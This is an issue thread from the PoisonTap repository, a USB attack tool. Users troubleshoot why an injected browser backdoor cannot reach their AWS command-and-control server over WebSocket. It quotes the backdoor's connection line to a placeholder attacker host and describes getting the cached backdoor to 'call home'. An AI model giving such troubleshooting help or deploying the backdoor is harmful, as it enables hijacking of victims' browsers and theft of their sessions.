samyk/poisontap #76: Unable to communicate via WebSocket

fEDUntu, 2016-12-15:
Hi all,
I just configured my poisontap and I've got some problems with the connection to my C&C server via WebSocket (the Cookie Siphoning is currently working for me).
I setup an Ubuntu Server machine on AWS Cloud for the testing purpose, installed NodeJs (version 6.9.2) and start the backend_server.js without errors:
[image]

In the victim machine (after plugged the poisontap) I invoke the WebSocket, for example, typing in the browser "google.com/PoisonTap" but I can't see any upcoming connection on my C&C server. 
If a inspect the code on the victim browser, I saw that the backdoor is fully loaded but I've got an error on the line 7 of "backdoor.html":
 **var socket = new WebSocket('ws://MY_PUBLIC_IP_SERVER:1337')** 
The exception raised is the following:
**WebSocket connection to 'ws://MY_PUBLIC_IP_SERVER:1337/' failed: Connection closed before receiving a handshake response**.

You guys have any suggestion?
Thanks in advance and **kudos to Samy for this amazing work**!

Lucg, 2016-12-15:
Change the "MY_PUBLIC_IP_SERVER" with the IP of your AWS Cloud

fEDUntu, 2016-12-15:
Of course there is the AWS IP address there.
I personally put that string just for not sharing the address with everyone. :)

Lucg, 2016-12-17:
Have you opened the 1337 diorami in the was instance with iptables? Are you sure that the poisontap configuration is not preventing your internet connection to work properly?

F4l13n5n0w, 2017-02-16:
Hi @fEDUntu , 
I got the same problem with you, but the difference is that after poisonTap been plugged in, I lost the Internet access but everything works fine (animation shows up, backdoor.html can be injected correctly, only issue is the victim could not communicate to my C&C server), wondering how do you configure your poisonTap to make it have Internet access ability ?
Thanks,

fEDUntu, 2017-02-16:
Hi @F4l13n5n0w,
in this moment I'm not able to check the infrastructure I'd set up for PoisonTap. 
Have you try to check the Internet connection on the victim machine **after** unplug the PoisonTap device?
If I remember correctly, during the infection all the internet traffic didn't go outsite but it was all "catched and replaced" by PoisonTap, but when I plugged it off (after saw the animation and undestrood that the infection was done) **I was able to connect to the Internet**.
Have you already check in this way?
Let me know.

F4l13n5n0w, 2017-02-16:
@fEDUntu 
All good now! Thanks very much! The fix is just unplug the PoisonTap to get the Internet access back and the cached backdoor will work straight away. so actually, it's now "calling home" when it's unplugged. LOL

p.s. Great job! @samyk

fEDUntu, 2017-02-16:
@F4l13n5n0w Great! It's always a pleasure when you can call back home! ;)

samyk, 2017-02-16:
Awesome! Can we close this?

fEDUntu, 2017-02-17:
@samyk Yes sir!

closed 2017-02-17 by samyk